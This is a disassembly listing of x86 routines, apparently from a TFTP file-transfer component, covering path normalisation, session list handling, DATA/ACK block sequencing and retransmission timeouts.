		cmp	dl, 5Ch
		jz	short loc_1002684
		cmp	dl, 2Fh
		jnz	short loc_1002703


loc_1002684:				; CODE XREF: sub_100261E+5Fj
		dec	esi
		mov	ecx, edi
		dec	esi
		cmp	esi, ebx
		jbe	short loc_10026E0


loc_100268C:				; CODE XREF: sub_100261E+7Bj
		mov	al, [esi]
		cmp	al, 5Ch
		jz	short loc_100269B
		cmp	al, 2Fh
		jz	short loc_100269B
		dec	esi
		cmp	esi, ebx
		jnb	short loc_100268C


loc_100269B:				; CODE XREF: sub_100261E+72j
					; sub_100261E+76j
		inc	esi


loc_100269C:				; CODE XREF: sub_100261E+8Ej
					; sub_100261E+EEj ...
		cmp	esi, [ebp+arg_0]
		jbe	short loc_10026AE
		cmp	byte ptr [esi-1], 20h
		lea	eax, [esi-1]
		jnz	short loc_10026AE
		mov	esi, eax
		jmp	short loc_100269C
; ---------------------------------------------------------------------------


loc_10026AE:				; CODE XREF: sub_100261E+81j
					; sub_100261E+8Aj
		mov	al, [ecx]
		cmp	al, 5Ch
		jz	short loc_10026B8
		cmp	al, 2Fh
		jnz	short loc_1002642


loc_10026B8:				; CODE XREF: sub_100261E+94j
		cmp	esi, ebx
		jz	short loc_10026CB
		mov	al, [esi-1]
		cmp	al, 5Ch
		jz	short loc_10026CB
		cmp	al, 2Fh
		jz	short loc_10026CB
		mov	byte ptr [esi],	5Ch
		inc	esi


loc_10026CB:				; CODE XREF: sub_100261E+9Cj
					; sub_100261E+A3j ...
		inc	ecx
		jz	short loc_10026D8
		mov	al, [ecx]
		cmp	al, 5Ch
		jz	short loc_10026CB
		cmp	al, 2Fh
		jz	short loc_10026CB


loc_10026D8:				; CODE XREF: sub_100261E+AEj
		mov	[ebp+arg_0], esi
		jmp	loc_1002642
; ---------------------------------------------------------------------------


loc_10026E0:				; CODE XREF: sub_100261E+6Cj
		xor	eax, eax
		jmp	short loc_10026FC
; ---------------------------------------------------------------------------


loc_10026E4:				; CODE XREF: sub_100261E+28j
		mov	cl, [esi-1]
		lea	eax, [esi-1]
		cmp	cl, 5Ch
		jz	short loc_10026F4
		cmp	cl, 2Fh
		jnz	short loc_10026F6


loc_10026F4:				; CODE XREF: sub_100261E+CFj
		mov	esi, eax


loc_10026F6:				; CODE XREF: sub_100261E+D4j
		and	byte ptr [esi],	0
		push	1
		pop	eax


loc_10026FC:				; CODE XREF: sub_100261E+C4j
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------


loc_1002703:				; CODE XREF: sub_100261E+50j
					; sub_100261E+64j ...
		mov	[esi], al
		mov	al, [ecx+1]
		inc	esi
		inc	ecx
		test	al, al
		jz	short loc_100269C
		cmp	al, 5Ch
		jz	short loc_100269C
		cmp	al, 2Fh
		jnz	short loc_1002703
		jmp	short loc_100269C
; ---------------------------------------------------------------------------


loc_1002718:				; CODE XREF: sub_100261E+3Fj
					; sub_100261E+48j
		mov	ecx, edi
		jmp	short loc_100269C
; ---------------------------------------------------------------------------


loc_100271C:				; CODE XREF: sub_100261E+30j
					; sub_100261E+11Dj
		test	al, al
		jz	loc_100269C
		cmp	al, 5Ch
		jz	loc_100269C
		cmp	al, 2Fh
		jz	loc_100269C
		mov	[esi], al
		mov	al, [ecx+1]
		inc	esi
		inc	ecx
		jmp	short loc_100271C
sub_100261E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100273D	proc near		; CODE XREF: sub_1002F31+18Cp
					; sub_100333A+197p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		mov	esi, [ebp+arg_8]
		push	edi
		mov	edi, esi
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		mov	edx, [ebp+arg_0]
		repne scasb
		not	ecx
		dec	ecx
		mov	edi, edx
		mov	ebx, ecx
		or	ecx, 0FFFFFFFFh
		repne scasb
		not	ecx
		dec	ecx
		cmp	byte ptr [ebx+esi-1], 5Ch
		mov	edi, ecx
		setz	al
		xor	ecx, ecx
		cmp	byte ptr [edx],	5Ch
		setz	cl
		test	eax, eax
		jnz	short loc_1002784
		test	ecx, ecx
		jnz	short loc_1002784
		mov	[ebp+arg_8], 1
		jmp	short loc_1002791
; ---------------------------------------------------------------------------


loc_1002784:				; CODE XREF: sub_100273D+38j
					; sub_100273D+3Cj
		and	[ebp+arg_8], 0
		test	eax, eax
		jz	short loc_1002791
		test	ecx, ecx
		jz	short loc_1002791
		dec	ebx


loc_1002791:				; CODE XREF: sub_100273D+45j
					; sub_100273D+4Dj ...
		mov	eax, [ebp+arg_8]
		mov	ecx, [ebp+arg_4]
		add	eax, edi
		add	eax, ebx
		dec	ecx
		cmp	eax, ecx
		jbe	short loc_10027A4
		xor	eax, eax
		jmp	short loc_10027DA
; ---------------------------------------------------------------------------


loc_10027A4:				; CODE XREF: sub_100273D+61j
		mov	eax, [ebp+arg_8]
		inc	edi
		add	eax, ebx
		push	edi
		add	eax, edx
		push	edx
		push	eax
		call	ds:dword_1001144
		mov	eax, [ebp+arg_0]
		mov	ecx, ebx
		mov	edx, ecx
		mov	edi, eax
		shr	ecx, 2
		rep movsd
		mov	ecx, edx
		add	esp, 0Ch
		and	ecx, 3
		cmp	[ebp+arg_8], 0
		rep movsb
		jz	short loc_10027D7
		mov	byte ptr [ebx+eax], 5Ch


loc_10027D7:				; CODE XREF: sub_100273D+94j
		push	1
		pop	eax


loc_10027DA:				; CODE XREF: sub_100273D+65j
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn	0Ch
sub_100273D	endp


; =============== S U B	R O U T	I N E =======================================



sub_10027E1	proc near		; CODE XREF: sub_1002B5E+C7p
					; sub_1002F31+36Bp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi
		mov	ecx, [esi+10024h]
		lea	eax, [esi+10024h]
		test	ecx, ecx
		jz	short loc_1002817
		and	dword ptr [eax], 0
		mov	eax, [esp+8+arg_4]
		and	word ptr [esi+10014h], 0
		mov	[esi+10020h], ecx
		mov	eax, [eax+20h]
		mov	[esi+1001Ch], eax
		jmp	short loc_1002877
; ---------------------------------------------------------------------------


loc_1002817:				; CODE XREF: sub_10027E1+14j
		mov	edi, ds:dword_1001104
		push	3
		call	edi ; dword_1001104
		mov	[esi+38h], ax
		mov	ax, [esi+10014h]
		push	eax
		call	edi ; dword_1001104
		mov	[esi+3Ah], ax
		mov	eax, [esp+8+arg_4]
		push	dword ptr [eax+20h]
		lea	eax, [esi+3Ch]
		push	eax
		push	dword ptr [esi+1002Ch]
		call	ds:dword_1001090
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		mov	[esi+1001Ch], eax
		jnz	short loc_100286E
		mov	esi, ds:dword_10010AC
		call	esi ; dword_10010AC
		call	esi ; dword_10010AC
		push	dword ptr [eax]
		call	ds:dword_100102C
		xor	eax, eax
		jmp	short loc_100287A
; ---------------------------------------------------------------------------


loc_100286E:				; CODE XREF: sub_10027E1+75j
		add	eax, 4
		mov	[esi+10020h], eax


loc_1002877:				; CODE XREF: sub_10027E1+34j
		push	1
		pop	eax


loc_100287A:				; CODE XREF: sub_10027E1+8Bj
		pop	edi
		pop	esi
		retn	8
sub_10027E1	endp


; =============== S U B	R O U T	I N E =======================================



sub_100287F	proc near		; CODE XREF: sub_1002F31+2C6p
					; sub_100333A+2CDp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, offset dword_1006080
		push	esi
		call	ds:dword_1001058
		mov	ecx, dword_1006098
		push	esi
		mov	eax, [esp+8+arg_0]
		mov	[eax], ecx
		mov	dword ptr [eax+4], offset dword_1006098
		mov	[ecx+4], eax
		mov	dword_1006098, eax
		call	ds:dword_100104C
		push	1
		pop	eax
		pop	esi
		retn	4
sub_100287F	endp


; =============== S U B	R O U T	I N E =======================================



sub_10028B5	proc near		; CODE XREF: sub_1002A3D+Cp
					; sub_1002EC8+8p ...

arg_0		= dword	ptr  4

		push	ebx
		mov	ebx, ds:dword_1001058
		push	esi
		push	edi
		mov	edi, offset dword_1006080
		push	edi
		call	ebx ; dword_1001058
		mov	eax, dword_1006098
		mov	ecx, offset dword_1006098


loc_10028D0:				; CODE XREF: sub_10028B5+2Dj
		cmp	eax, ecx
		jz	short loc_10028F2
		mov	edx, [eax+8]
		lea	esi, [eax-18h]
		cmp	edx, [esp+0Ch+arg_0]
		jz	short loc_10028E4
		mov	eax, [eax]
		jmp	short loc_10028D0
; ---------------------------------------------------------------------------


loc_10028E4:				; CODE XREF: sub_10028B5+29j
		push	esi
		call	ebx ; dword_1001058
		push	edi
		call	ds:dword_100104C
		mov	eax, esi
		jmp	short loc_10028FB
; ---------------------------------------------------------------------------


loc_10028F2:				; CODE XREF: sub_10028B5+1Dj
		push	edi
		call	ds:dword_100104C
		xor	eax, eax


loc_10028FB:				; CODE XREF: sub_10028B5+3Bj
		pop	edi
		pop	esi
		pop	ebx
		retn	4
sub_10028B5	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002901	proc near		; CODE XREF: sub_100297A+Ap

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		mov	eax, [esi+20h]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_1002915
		push	eax
		call	ds:dword_100111C


loc_1002915:				; CODE XREF: sub_1002901+Bj
		mov	eax, [esi+10004h]
		test	eax, eax
		jz	short loc_100292E
		push	0
		push	eax
		push	dword_10060A0
		call	ds:dword_1001158


loc_100292E:				; CODE XREF: sub_1002901+1Cj
		push	0
		push	dword ptr [esi+0FFFCh]
		call	ds:dword_1001168
		push	dword ptr [esi+0FFF8h]
		call	ds:dword_1001054
		push	esi
		call	ds:dword_1001028
		pop	esi
		retn	4
sub_1002901	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002953	proc near		; CODE XREF: sub_100297A+2Fp
					; sub_100297A+37p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		mov	eax, [esi+1002Ch]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_100296B
		push	eax
		call	ds:dword_100108C
		pop	ecx


loc_100296B:				; CODE XREF: sub_1002953+Ej
		push	esi
		call	ds:dword_10010A0
		pop	ecx
		pop	esi
		retn	4
sub_1002953	endp

; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_100297A	proc near		; CODE XREF: sub_10029BA+55p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_10029B6
		push	esi
		call	sub_1002901
		mov	eax, [esi+24h]
		dec	eax
		jz	short loc_10029B0
		dec	eax
		jz	short loc_10029A8
		dec	eax
		jz	short loc_10029A0
		dec	eax
		jnz	short loc_10029B6
		push	esi
		call	nullsub_1
		jmp	short loc_10029B6
; ---------------------------------------------------------------------------


loc_10029A0:				; CODE XREF: sub_100297A+19j
		push	esi
		call	nullsub_1
		jmp	short loc_10029B6
; ---------------------------------------------------------------------------


loc_10029A8:				; CODE XREF: sub_100297A+16j
		push	esi
		call	sub_1002953
		jmp	short loc_10029B6
; ---------------------------------------------------------------------------


loc_10029B0:				; CODE XREF: sub_100297A+13j
		push	esi
		call	sub_1002953


loc_10029B6:				; CODE XREF: sub_100297A+7j
					; sub_100297A+1Cj ...
		pop	esi
		retn	4
sub_100297A	endp


; =============== S U B	R O U T	I N E =======================================



sub_10029BA	proc near		; DATA XREF: sub_10018DB+98o
		push	ebx
		mov	ebx, ds:dword_1001058
		push	esi
		push	offset dword_1006080
		call	ebx ; dword_1001058
		mov	esi, dword_1006098
		cmp	esi, offset dword_1006098
		jz	short loc_1002A28
		push	edi
		push	ebp


loc_10029D9:				; CODE XREF: sub_10029BA+6Aj
		lea	edi, [esi-18h]
		push	edi
		call	ebx ; dword_1001058
		mov	ebp, [esi]
		inc	dword ptr [edi+10008h]
		cmp	dword ptr [edi+10008h],	4
		lea	eax, [edi+10008h]
		push	edi
		jb	short loc_1002A16
		call	ebx ; dword_1001058
		mov	eax, [esi]
		mov	esi, [esi+4]
		mov	[esi], eax
		mov	[eax+4], esi
		mov	ax, [edi+2Ah]
		push	eax
		call	ds:dword_1001104
		push	edi
		call	sub_100297A
		jmp	short loc_1002A1C
; ---------------------------------------------------------------------------


loc_1002A16:				; CODE XREF: sub_10029BA+3Bj
		call	ds:dword_100104C


loc_1002A1C:				; CODE XREF: sub_10029BA+5Aj
		cmp	ebp, offset dword_1006098
		mov	esi, ebp
		jnz	short loc_10029D9
		pop	ebp
		pop	edi


loc_1002A28:				; CODE XREF: sub_10029BA+1Bj
		push	offset dword_1006080
		call	ds:dword_100104C
		call	sub_1001A1F
		pop	esi
		pop	ebx
		retn	8
sub_10029BA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1002A3D	proc near		; DATA XREF: sub_1002F31+341o
					; sub_100333A+32Co

var_10		= byte ptr -10h
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		push	edi
		push	[ebp+arg_0]
		call	sub_10028B5
		mov	esi, eax
		xor	ebx, ebx
		cmp	esi, ebx
		jz	loc_1002B57
		mov	eax, [esi+1000Ch]
		cmp	eax, 0Ah
		jnb	loc_1002B0B
		cmp	eax, 5
		jbe	short loc_1002A8E
		lea	eax, [ebp+var_10]
		push	eax
		call	ds:dword_1001024
		mov	ax, [esi+2Ah]
		push	eax
		call	ds:dword_100110C
		mov	ax, [esi+3Ah]
		push	eax
		call	ds:dword_1001104


loc_1002A8E:				; CODE XREF: sub_1002A3D+2Fj
		lea	eax, [esi+28h]
		push	10h
		push	eax
		push	ebx
		push	dword ptr [esi+10020h]
		lea	eax, [esi+38h]
		push	eax
		push	dword ptr [esi+20h]
		call	ds:dword_1001130
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1002AB3
		call	ds:dword_10010F8


loc_1002AB3:				; CODE XREF: sub_1002A3D+6Ej
		mov	edi, [esi+10004h]
		inc	dword ptr [esi+1000Ch]
		cmp	edi, ebx
		jz	loc_1002B4C
		cmp	[esi+10028h], ebx
		jnz	short loc_1002AEA
		mov	eax, [esi+10000h]
		lea	ecx, [esi+10000h]
		shl	eax, 1
		mov	edx, 2710h
		mov	[ecx], eax
		cmp	eax, edx
		jbe	short loc_1002AEA
		mov	[ecx], edx


loc_1002AEA:				; CODE XREF: sub_1002A3D+90j
					; sub_1002A3D+A9j
		mov	eax, [esi+10000h]
		push	eax
		push	eax
		push	edi
		push	dword_10060A0
		call	ds:dword_1001154
		cmp	eax, ebx
		jz	short loc_1002B4C
		call	ds:dword_1001038
		jmp	short loc_1002B4C
; ---------------------------------------------------------------------------


loc_1002B0B:				; CODE XREF: sub_1002A3D+26j
		cmp	esi, ebx
		jz	short loc_1002B57
		push	offset aTimeout	; "Timeout"
		push	ebx
		push	dword ptr [esi+20h]
		lea	eax, [esi+28h]
		push	ebx
		push	eax
		call	sub_100230A
		mov	eax, [esi+10004h]
		lea	edi, [esi+10004h]
		cmp	eax, ebx
		jz	short loc_1002B40
		push	ebx
		push	eax
		push	dword_10060A0
		call	ds:dword_1001158


loc_1002B40:				; CODE XREF: sub_1002A3D+F3j
		mov	[edi], ebx
		mov	dword ptr [esi+10008h],	4


loc_1002B4C:				; CODE XREF: sub_1002A3D+84j
					; sub_1002A3D+C4j ...
		cmp	esi, ebx
		jz	short loc_1002B57
		push	esi
		call	ds:dword_100104C


loc_1002B57:				; CODE XREF: sub_1002A3D+17j
					; sub_1002A3D+D0j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	8
sub_1002A3D	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002B5E	proc near		; CODE XREF: sub_1002EC8+3Dp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ecx
		push	ebx
		mov	ebx, ds:dword_100110C
		push	ebp
		push	esi
		mov	esi, [esp+10h+arg_0]
		push	edi
		mov	edi, [esp+14h+arg_4]
		xor	ebp, ebp
		mov	eax, [esi+10018h]
		push	4
		mov	[esp+18h+var_4], ebp
		mov	[edi+20h], eax
		call	ebx ; dword_100110C
		cmp	[edi+34h], ax
		jnz	short loc_1002BA6
		mov	ax, [esi+10014h]
		push	eax
		call	ebx ; dword_100110C
		cmp	[edi+36h], ax
		jnz	short loc_1002BA6
		and	dword ptr [esi+1000Ch],	0
		push	1
		pop	ebp
		jmp	short loc_1002BCE
; ---------------------------------------------------------------------------


loc_1002BA6:				; CODE XREF: sub_1002B5E+2Aj
					; sub_1002B5E+3Aj
		mov	ax, [edi+36h]
		push	eax
		call	ebx ; dword_100110C
		mov	ax, [edi+34h]
		push	eax
		call	ds:dword_1001104
		push	4
		call	ebx ; dword_100110C
		cmp	[edi+34h], ax
		jnz	short loc_1002BCE
		mov	ax, [esi+10014h]
		dec	ax
		push	eax
		call	ebx ; dword_100110C


loc_1002BCE:				; CODE XREF: sub_1002B5E+46j
					; sub_1002B5E+62j
		test	ebp, ebp
		jz	loc_1002C96
		cmp	dword ptr [esi+10030h],	0
		jz	short loc_1002C1C
		mov	eax, [esi+10004h]
		lea	edi, [esi+10004h]
		test	eax, eax
		jz	short loc_1002BFE
		push	0
		push	eax
		push	dword_10060A0
		call	ds:dword_1001158


loc_1002BFE:				; CODE XREF: sub_1002B5E+8Fj
		and	dword ptr [edi], 0
		mov	dword ptr [esi+10008h],	4


loc_1002C0B:				; CODE XREF: sub_1002B5E+DBj
					; sub_1002B5E+13Ej ...
		push	esi
		call	ds:dword_100104C
		xor	eax, eax


loc_1002C14:				; CODE XREF: sub_1002B5E+183j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		pop	ecx
		retn	8
; ---------------------------------------------------------------------------


loc_1002C1C:				; CODE XREF: sub_1002B5E+7Fj
		inc	word ptr [esi+10014h]
		push	edi
		push	esi
		call	sub_10027E1
		mov	ebp, eax
		xor	eax, eax
		cmp	ebp, eax
		jnz	short loc_1002C3B
		mov	ax, [edi+0Eh]
		push	eax
		call	ebx ; dword_100110C
		jmp	short loc_1002C0B
; ---------------------------------------------------------------------------


loc_1002C3B:				; CODE XREF: sub_1002B5E+D2j
		cmp	[esi+10028h], eax
		mov	[esi+1000Ch], eax
		mov	[esi+10008h], eax
		jnz	short loc_1002C59
		mov	dword ptr [esi+10000h],	3E8h


loc_1002C59:				; CODE XREF: sub_1002B5E+EFj
		mov	ecx, [esi+10004h]
		cmp	ecx, eax
		jz	short loc_1002C78
		mov	eax, [esi+10000h]
		push	eax
		push	eax
		push	ecx
		push	dword_10060A0
		call	ds:dword_1001154


loc_1002C78:				; CODE XREF: sub_1002B5E+103j
		mov	eax, [esi+1001Ch]
		cmp	eax, [edi+20h]
		jnb	short loc_1002C9A
		mov	ax, [edi+0Eh]
		push	eax
		call	ebx ; dword_100110C
		mov	dword ptr [esi+10030h],	1
		jmp	short loc_1002C9A
; ---------------------------------------------------------------------------


loc_1002C96:				; CODE XREF: sub_1002B5E+72j
		mov	ebp, [esp+14h+var_4]


loc_1002C9A:				; CODE XREF: sub_1002B5E+123j
					; sub_1002B5E+136j
		test	ebp, ebp
		jz	loc_1002C0B
		mov	ax, [edi+0Eh]
		push	eax
		call	ebx ; dword_100110C
		add	edi, 0Ch
		push	10h
		push	edi
		push	0
		push	dword ptr [esi+10020h]
		lea	eax, [esi+38h]
		push	eax
		push	dword ptr [esi+20h]
		call	ds:dword_1001130
		cmp	eax, 0FFFFFFFFh
		jnz	loc_1002C0B
		call	ds:dword_10010F8
		test	esi, esi
		jz	short loc_1002CDE
		push	esi
		call	ds:dword_100104C


loc_1002CDE:				; CODE XREF: sub_1002B5E+177j
		push	1
		pop	eax
		jmp	loc_1002C14
sub_1002B5E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1002CE6	proc near		; CODE XREF: sub_1002EC8+34p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		and	[ebp+var_4], 0
		push	ebx
		mov	ebx, ds:dword_100110C
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		mov	edi, [ebp+arg_4]
		push	3
		mov	eax, [esi+10018h]
		mov	[edi+20h], eax
		call	ebx ; dword_100110C
		cmp	[edi+34h], ax
		jnz	short loc_1002D3A
		mov	ax, [esi+10014h]
		inc	ax
		push	eax
		call	ebx ; dword_100110C
		cmp	[edi+36h], ax
		jnz	short loc_1002D3A
		inc	word ptr [esi+10014h]
		xor	ebx, ebx
		mov	[ebp+var_4], 1
		mov	[esi+10008h], ebx
		jmp	short loc_1002D9D
; ---------------------------------------------------------------------------


loc_1002D3A:				; CODE XREF: sub_1002CE6+28j
					; sub_1002CE6+3Aj
		push	3
		call	ebx ; dword_100110C
		cmp	[edi+34h], ax
		jnz	short loc_1002D9B
		mov	ax, [esi+10014h]
		push	eax
		call	ebx ; dword_100110C
		cmp	[edi+36h], ax
		jnz	short loc_1002D9B
		mov	ebx, ds:dword_1001104
		push	4
		call	ebx ; dword_1001104
		mov	[esi+38h], ax
		mov	ax, [esi+10014h]
		push	eax
		call	ebx ; dword_1001104
		add	edi, 0Ch
		push	10h
		mov	[esi+3Ah], ax
		push	edi
		push	0
		lea	eax, [esi+38h]
		push	4
		push	eax
		push	dword ptr [esi+20h]
		call	ds:dword_1001130
		cmp	eax, 0FFFFFFFFh
		jnz	loc_1002EB3
		call	ds:dword_10010F8
		jmp	loc_1002EB3
; ---------------------------------------------------------------------------


loc_1002D9B:				; CODE XREF: sub_1002CE6+5Cj
					; sub_1002CE6+6Cj
		xor	ebx, ebx


loc_1002D9D:				; CODE XREF: sub_1002CE6+52j
		cmp	[ebp+var_4], ebx
		jz	short loc_1002DE4
		lea	eax, [ebp+arg_4]
		push	eax
		mov	eax, [edi+2Ch]
		push	dword ptr [esi+10030h]
		sub	eax, 4
		push	eax
		lea	eax, [edi+38h]
		push	eax
		push	dword ptr [esi+1002Ch]
		call	sub_100373A
		cmp	[ebp+var_4], ebx
		mov	[ebp+arg_0], eax
		jz	short loc_1002DE4
		cmp	eax, ebx
		jge	short loc_1002DF7
		push	ebx
		push	3
		push	dword ptr [edi+8]
		lea	eax, [edi+0FFF1h]
		add	edi, 0Ch
		push	eax
		push	edi
		call	sub_100230A


loc_1002DE4:				; CODE XREF: sub_1002CE6+BAj
					; sub_1002CE6+E2j
		cmp	esi, ebx
		jz	short loc_1002DEF
		push	esi
		call	ds:dword_100104C


loc_1002DEF:				; CODE XREF: sub_1002CE6+100j
		push	1
		pop	eax
		jmp	loc_1002EBC
; ---------------------------------------------------------------------------


loc_1002DF7:				; CODE XREF: sub_1002CE6+E6j
		mov	eax, [edi+2Ch]
		sub	eax, 4
		cmp	eax, [edi+20h]
		ja	loc_1002EB3
		mov	ebx, ds:dword_1001104
		push	4
		call	ebx ; dword_1001104
		mov	[esi+38h], ax
		mov	ax, [esi+10014h]
		push	eax
		call	ebx ; dword_1001104
		mov	[esi+3Ah], ax
		lea	eax, [edi+0Ch]
		push	10h
		xor	ebx, ebx
		push	eax
		push	ebx
		lea	eax, [esi+38h]
		push	4
		push	eax
		push	dword ptr [esi+20h]
		call	ds:dword_1001130
		mov	[ebp+arg_0], eax
		mov	eax, [esi+10004h]
		cmp	eax, ebx
		jz	short loc_1002E74
		cmp	[esi+10028h], ebx
		mov	[esi+1000Ch], ebx
		jnz	short loc_1002E5F
		mov	dword ptr [esi+10000h],	3E8h


loc_1002E5F:				; CODE XREF: sub_1002CE6+16Dj
		mov	ecx, [esi+10000h]
		push	ecx
		push	ecx
		push	eax
		push	dword_10060A0
		call	ds:dword_1001154


loc_1002E74:				; CODE XREF: sub_1002CE6+15Fj
		cmp	[ebp+arg_0], 0FFFFFFFFh
		jnz	short loc_1002E80
		call	ds:dword_10010F8


loc_1002E80:				; CODE XREF: sub_1002CE6+192j
		mov	eax, [edi+2Ch]
		sub	eax, 4
		cmp	eax, [edi+20h]
		jnb	short loc_1002EB3
		mov	eax, [esi+10004h]
		cmp	eax, ebx
		jz	short loc_1002EA3
		push	ebx
		push	eax
		push	dword_10060A0
		call	ds:dword_1001158


loc_1002EA3:				; CODE XREF: sub_1002CE6+1ADj
		mov	[esi+10004h], ebx
		mov	dword ptr [esi+10008h],	4


loc_1002EB3:				; CODE XREF: sub_1002CE6+A4j
					; sub_1002CE6+B0j ...
		push	esi
		call	ds:dword_100104C
		xor	eax, eax


loc_1002EBC:				; CODE XREF: sub_1002CE6+10Cj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	8
sub_1002CE6	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002EC3	proc near		; CODE XREF: sub_1002EC8+22p
					; sub_1002EC8+2Bp
		xor	eax, eax
		retn	8
sub_1002EC3	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002EC8	proc near		; CODE XREF: sub_1001A91+254p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	dword ptr [esi+8]
		call	sub_10028B5
		test	eax, eax
		jz	short loc_1002F0A
		mov	ecx, [eax+24h]
		dec	ecx
		jz	short loc_1002F03
		dec	ecx
		jz	short loc_1002EFA
		dec	ecx
		jz	short loc_1002EF1
		dec	ecx
		jnz	short loc_1002F0A
		push	esi
		push	eax
		call	sub_1002EC3
		jmp	short loc_1002F0A
; ---------------------------------------------------------------------------


loc_1002EF1:				; CODE XREF: sub_1002EC8+1Bj
		push	esi
		push	eax
		call	sub_1002EC3
		jmp	short loc_1002F0A
; ---------------------------------------------------------------------------


loc_1002EFA:				; CODE XREF: sub_1002EC8+18j
		push	esi
		push	eax
		call	sub_1002CE6
		jmp	short loc_1002F0A
; ---------------------------------------------------------------------------


loc_1002F03:				; CODE XREF: sub_1002EC8+15j
		push	esi
		push	eax
		call	sub_1002B5E


loc_1002F0A:				; CODE XREF: sub_1002EC8+Fj
					; sub_1002EC8+1Ej ...
		pop	esi
		retn	4
sub_1002EC8	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002F0E	proc near		; CODE XREF: sub_1002F31+20p
					; sub_100333A+41p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		xor	eax, eax
		cmp	[esp+arg_4], eax
		jbe	short loc_1002F27


loc_1002F16:				; CODE XREF: sub_1002F0E+17j
		mov	ecx, [esp+arg_0]
		cmp	byte ptr [eax+ecx], 0
		jz	short loc_1002F2C
		inc	eax
		cmp	eax, [esp+arg_4]
		jb	short loc_1002F16


loc_1002F27:				; CODE XREF: sub_1002F0E+6j
		xor	eax, eax

locret_1002F29:				; CODE XREF: sub_1002F0E+21j
		retn	8
; ---------------------------------------------------------------------------


loc_1002F2C:				; CODE XREF: sub_1002F0E+10j
		push	1
		pop	eax
		jmp	short locret_1002F29
sub_1002F0E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1002F31	proc near		; CODE XREF: sub_1001A91+223p
					; DATA XREF: sub_1001A91+1FCo

var_28		= word ptr -28h
var_26		= word ptr -26h
var_24		= dword	ptr -24h
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		push	ebx
		and	[ebp+var_10], 0
		and	[ebp+var_14], 0
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	0FFBAh
		lea	ebx, [esi+36h]
		push	ebx
		mov	[ebp+var_18], ebx
		call	sub_1002F0E
		test	eax, eax
		jz	loc_100330F
		mov	edi, ebx
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		push	10034h
		repne scasb
		not	ecx
		dec	ecx
		lea	eax, [ecx+ebx+1]
		mov	[ebp+var_4], eax
		call	ds:dword_1001094
		mov	ebx, eax
		pop	ecx
		test	ebx, ebx
		jz	loc_1003331
		mov	ecx, 400Dh
		xor	eax, eax
		mov	edi, ebx
		rep stosd
		push	dword ptr [esi+10h]
		call	ds:dword_1001120
		mov	[ebp+var_8], eax
		mov	ax, [esi+0Eh]
		push	eax
		call	ds:dword_1001104
		mov	edi, [ebp+var_4]
		mov	[ebp+var_C], edi
		mov	al, [edi]
		test	al, al
		jz	short loc_1002FCD


loc_1002FB5:				; CODE XREF: sub_1002F31+97j
		movsx	eax, al
		push	eax
		call	ds:dword_1001150
		mov	[edi], al
		mov	al, [edi+1]
		inc	edi
		pop	ecx
		test	al, al
		jnz	short loc_1002FB5
		mov	[ebp+var_C], edi


loc_1002FCD:				; CODE XREF: sub_1002F31+82j
		mov	edi, [ebp+var_4]
		mov	eax, offset aNetascii ;	"netascii"


loc_1002FD5:				; CODE XREF: sub_1002F31+C0j
		mov	dl, [edi]
		mov	cl, dl
		cmp	dl, [eax]
		jnz	short loc_1002FF7
		test	cl, cl
		jz	short loc_1002FF3
		mov	dl, [edi+1]
		mov	cl, dl
		cmp	dl, [eax+1]
		jnz	short loc_1002FF7
		inc	edi
		inc	edi
		inc	eax
		inc	eax
		test	cl, cl
		jnz	short loc_1002FD5


loc_1002FF3:				; CODE XREF: sub_1002F31+AEj
		xor	eax, eax
		jmp	short loc_1002FFC
; ---------------------------------------------------------------------------


loc_1002FF7:				; CODE XREF: sub_1002F31+AAj
					; sub_1002F31+B8j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_1002FFC:				; CODE XREF: sub_1002F31+C4j
		test	eax, eax
		jz	short loc_1003037
